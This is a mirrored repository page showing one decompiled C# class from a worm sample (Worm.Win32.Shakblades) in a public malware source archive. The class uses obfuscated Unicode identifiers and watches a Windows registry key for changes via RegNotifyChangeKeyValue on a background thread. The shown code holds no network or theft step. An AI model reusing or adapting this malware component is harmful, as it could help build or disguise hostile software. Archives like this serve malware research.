ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ᘽƭ.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

222 lines
7.3 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᘽƭ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
namespace Ҧ߲ʽ
{
public class ƭ : IDisposable
{
private const int \u1B7Eı = 1;
private const int \u0D58Ꮈ\u00AEႍ = 16;
private const int \u08D2ᰆ = 131072;
private static readonly IntPtr Օ\u0FC9ˡ = new IntPtr(int.MinValue);
private static readonly IntPtr ǹ\u05FFఔ = new IntPtr(-2147483647);
private static readonly IntPtr \u1C31᪱ࢢ = new IntPtr(-2147483646);
private static readonly IntPtr = new IntPtr(-2147483645);
private static readonly IntPtr \u139Fᙇ = new IntPtr(-2147483644);
private static readonly IntPtr yଳጻഷቝ = new IntPtr(-2147483643);
private static readonly IntPtr \u176D᧒ޢਕೆጾૐ = new IntPtr(-2147483642);
private IntPtr \u0029Ѽ\u09D1ᚻ\u08BFჶ;
private string ˣ;
private object ϒ\u0EDBไ\u0CC5ᒎ = new object();
private Thread ݍ\u0B98\u0FF8ρ;
private ManualResetEvent \u08F1ᤜᬯ = new ManualResetEvent(false);
private \u187Bȸº᭰\u09FC = \u187Bȸº᭰\u09FC.\u18ABٞ\u1C96ᦁྌᚳ | \u187Bȸº᭰\u09FC. | \u187Bȸº᭰\u09FC.\u000A | \u187Bȸº᭰\u09FC.\u0C11ᘾ;
public ƭ(RegistryKey registryKey) => this.\u05F8ᨅ᩵۷ኝ᭯(registryKey.Name);
public ƭ(string name) => this.\u05F8ᨅ᩵۷ኝ᭯(name);
public ƭ(RegistryHive registryHive, string subKey) => this.\u1A8Cˉၕᖁ\u001Eඹᶋ(registryHive, subKey);
[DllImport("advapi32.dll", EntryPoint = "RegOpenKeyEx", SetLastError = true)]
private static extern int זى\u0C70\u0DCE\u0DF4(
IntPtr _param0,
string _param1,
uint Çڔ,
int _param3,
out IntPtr _param4);
[DllImport("advapi32.dll", EntryPoint = "RegNotifyChangeKeyValue", SetLastError = true)]
private static extern int \u0731ᄦѧ\u08D2װ\u002Fᇣ(
IntPtr _param0,
bool _param1,
\u187Bȸº᭰\u09FC _param2,
IntPtr _param3,
bool _param4);
[DllImport("advapi32.dll", EntryPoint = "RegCloseKey", SetLastError = true)]
private static extern int \u0008Տ\u0DF9ទƕ\u02FD(IntPtr _param0);
public event EventHandler ŕ\u0AD4߭;
protected virtual void OnRegChanged()
{
EventHandler eventHandler = this.\u0BF1;
if (eventHandler == null)
return;
eventHandler((object) this, (EventArgs) null);
}
public event ErrorEventHandler ϦڢƘ;
protected virtual void OnError(Exception e)
{
}
public void Dispose()
{
this.\u191F();
GC.SuppressFinalize((object) this);
}
public \u187Bȸº᭰\u09FC ܜѕ֨
{
get => this.;
set
{
lock (this.ϒ\u0EDBไ\u0CC5ᒎ)
this. = value;
}
}
private void \u1A8Cˉၕᖁ\u001Eඹᶋ(RegistryHive ԭך, string )
{
switch (ԭך)
{
case RegistryHive.ClassesRoot:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.Օ\u0FC9ˡ;
break;
case RegistryHive.CurrentUser:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.ǹ\u05FFఔ;
break;
case RegistryHive.LocalMachine:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u1C31᪱ࢢ;
break;
case RegistryHive.Users:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.;
break;
case RegistryHive.PerformanceData:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u139Fᙇ;
break;
case RegistryHive.CurrentConfig:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.yଳጻഷቝ;
break;
case RegistryHive.DynData:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u176D᧒ޢਕೆጾૐ;
break;
}
this.ˣ = ;
}
private void \u05F8ᨅ᩵۷ኝ᭯(string _param1)
{
string[] strArray = _param1.Split('\\');
switch (strArray[0])
{
case "HKEY_CLASSES_ROOT":
case "HKCR":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.Օ\u0FC9ˡ;
break;
case "HKEY_CURRENT_USER":
case "HKCU":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.ǹ\u05FFఔ;
break;
case "HKEY_LOCAL_MACHINE":
case "HKLM":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u1C31᪱ࢢ;
break;
case "HKEY_USERS":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.;
break;
case "HKEY_CURRENT_CONFIG":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.yଳጻഷቝ;
break;
default:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = IntPtr.Zero;
break;
}
this.ˣ = string.Join("\\", strArray, 1, strArray.Length - 1);
}
public bool \u008Dᆉܳ => this.ݍ\u0B98\u0FF8ρ != null;
public void ůߝ()
{
lock (this.ϒ\u0EDBไ\u0CC5ᒎ)
{
if (this.\u008Dᆉܳ)
return;
this.\u08F1ᤜᬯ.Reset();
this.ݍ\u0B98\u0FF8ρ = new Thread(new ThreadStart(this.\u0F02̢᠗Ôଚ᭗ɭ));
this.ݍ\u0B98\u0FF8ρ.IsBackground = true;
this.ݍ\u0B98\u0FF8ρ.Start();
}
}
public void \u191F()
{
lock (this.ϒ\u0EDBไ\u0CC5ᒎ)
{
Thread ݍρ = this.ݍ\u0B98\u0FF8ρ;
if (ݍρ == null)
return;
this.\u08F1ᤜᬯ.Set();
ݍρ.Join();
}
}
private void \u0F02̢᠗Ôଚ᭗ɭ()
{
try
{
this.ۺ\u05BE᭬ქ();
}
catch (Exception ex)
{
this.OnError(ex);
}
this.ݍ\u0B98\u0FF8ρ = (Thread) null;
}
private void ۺ\u05BE᭬ქ()
{
IntPtr num;
int error1 = ƭ.זى\u0C70\u0DCE\u0DF4(this.\u0029Ѽ\u09D1ᚻ\u08BFჶ, this.ˣ, 0U, 131089, out num);
if (error1 != 0)
throw new Win32Exception(error1);
try
{
AutoResetEvent autoResetEvent = new AutoResetEvent(false);
WaitHandle[] waitHandles = new WaitHandle[2]
{
(WaitHandle) autoResetEvent,
(WaitHandle) this.\u08F1ᤜᬯ
};
while (!this.\u08F1ᤜᬯ.WaitOne(0, true))
{
int error2 = ƭ.\u0731ᄦѧ\u08D2װ\u002Fᇣ(num, true, this., autoResetEvent.SafeWaitHandle.DangerousGetHandle(), true);
if (error2 != 0)
throw new Win32Exception(error2);
if (WaitHandle.WaitAny(waitHandles) == 0)
this.OnRegChanged();
}
}
finally
{
if (num != IntPtr.Zero)
ƭ.\u0008Տ\u0DF9ទƕ\u02FD(num);
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink